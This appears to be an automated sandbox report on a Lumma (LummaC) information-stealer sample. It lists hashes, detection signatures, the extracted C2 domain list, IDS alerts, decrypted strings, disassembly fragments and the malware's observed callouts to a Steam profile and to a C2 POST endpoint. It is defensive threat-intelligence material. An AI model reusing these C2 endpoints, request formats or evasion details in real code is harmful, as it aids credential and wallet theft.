Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1528464
MD5:	92dd1108dbdebf3163c394deb38b0278
SHA1:	e3a3638739deffd8b817a53b73f71cafbae978f6
SHA256:	5a8fb0d6f8d170f4a1054b55fd5ce72e195810d130ef6e72ea76ea9441dbb996
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 92DD1108DBDEBF3163C394DEB38B0278)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["eaglepawnoy.stor", "clearancek.site", "studennotediw.stor", "mobbipenju.stor", "bathdoomgaz.stor", "licendfilteo.site", "spirittunek.stor", "dissapoiznw.stor"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:23:16.436330+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49704	104.21.53.8	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:23:16.436330+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49704	104.21.53.8	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:23:13.938398+0200	2056477	1	Domain Observed Used for C2 Detected	192.168.2.7	53630	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:23:13.871380+0200	2056471	1	Domain Observed Used for C2 Detected	192.168.2.7	49480	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:23:13.918586+0200	2056481	1	Domain Observed Used for C2 Detected	192.168.2.7	53817	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:23:13.899468+0200	2056483	1	Domain Observed Used for C2 Detected	192.168.2.7	57855	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:23:13.961689+0200	2056473	1	Domain Observed Used for C2 Detected	192.168.2.7	62918	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:23:13.888459+0200	2056485	1	Domain Observed Used for C2 Detected	192.168.2.7	50125	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:23:13.949817+0200	2056475	1	Domain Observed Used for C2 Detected	192.168.2.7	56085	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:23:13.927966+0200	2056479	1	Domain Observed Used for C2 Detected	192.168.2.7	61461	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/badges	URL Reputation: Label: malware

Found malware configuration

Source: file.exe.7100.3.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["eaglepawnoy.stor", "clearancek.site", "studennotediw.stor", "mobbipenju.stor", "bathdoomgaz.stor", "licendfilteo.site", "spirittunek.stor", "dissapoiznw.stor"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: clearancek.site
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: licendfilteo.site
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: spirittunek.stor
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bathdoomgaz.stor
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: studennotediw.stor
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: dissapoiznw.stor
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: eaglepawnoy.stor
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: mobbipenju.stor
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: clearancek.site
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 4SD0y4--legendaryy

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49704 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00DE50FA
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00DAD110
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00DAD110
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	3_2_00DE63B8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00DE5700
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	3_2_00DE99D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h	3_2_00DE695B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	3_2_00DAFCA0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	3_2_00DB0EEC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	3_2_00DE6094
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	3_2_00DE4040
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [edx]	3_2_00DA1000
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then dec ebx	3_2_00DDF030
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	3_2_00DB6F91
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	3_2_00DCD1E1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	3_2_00DB42FC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	3_2_00DC2260
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [esi], ax	3_2_00DC2260
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	3_2_00DD23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	3_2_00DD23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	3_2_00DD23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00DD23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	3_2_00DD23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+14h]	3_2_00DD23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, eax	3_2_00DAA300
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	3_2_00DE64B8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00DBD457
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	3_2_00DE1440
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	3_2_00DCC470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	3_2_00DBB410
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	3_2_00DCE40C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00DC9510
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	3_2_00DB6536
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	3_2_00DE7520
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00DDB650
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	3_2_00DCE66A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	3_2_00DE67EF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	3_2_00DCD7AF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	3_2_00DE7710
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	3_2_00DC28E9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	3_2_00DA49A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	3_2_00DBD961
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	3_2_00DE3920
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	3_2_00DB1ACD
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	3_2_00DA5A50
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	3_2_00DE4A40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	3_2_00DB1A3C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	3_2_00DB1BEE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	3_2_00DB3BE2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_00DD0B80
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+000006B8h]	3_2_00DBDB6F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	3_2_00DBDB6F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	3_2_00DE9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	3_2_00DCCCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00DCCCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h	3_2_00DCCCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00DE9CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	3_2_00DE9CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	3_2_00DCAC91
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], ax	3_2_00DCAC91
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	3_2_00DCEC48
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	3_2_00DC7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh	3_2_00DDFC20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00DE8D8A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh	3_2_00DCFD10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	3_2_00DCDD29
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	3_2_00DB1E93
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	3_2_00DB6EBF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+00h]	3_2_00DABEB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	3_2_00DA6EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	3_2_00DCAE57
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00DC5E70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00DC7E60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, ecx	3_2_00DB4E2A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], 0000h	3_2_00DBFFDF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	3_2_00DE5FD6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	3_2_00DA8FD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	3_2_00DE7FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00DE7FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	3_2_00DB6F91
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00DDFF70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	3_2_00DC9F62

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:53630 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:50125 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:53817 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:61461 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:57855 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:62918 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:49480 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:56085 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 104.21.53.8:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: eaglepawnoy.stor
Source: Malware configuration extractor	URLs: clearancek.site
Source: Malware configuration extractor	URLs: studennotediw.stor
Source: Malware configuration extractor	URLs: mobbipenju.stor
Source: Malware configuration extractor	URLs: bathdoomgaz.stor
Source: Malware configuration extractor	URLs: licendfilteo.site
Source: Malware configuration extractor	URLs: spirittunek.stor
Source: Malware configuration extractor	URLs: dissapoiznw.stor

Source: Joe Sandbox View	IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: clearancek.site
Source: global traffic	DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic	DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic	DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic	DNS traffic detected: DNS query: studennotediw.store
Source: global traffic	DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic	DNS traffic detected: DNS query: spirittunek.store
Source: global traffic	DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
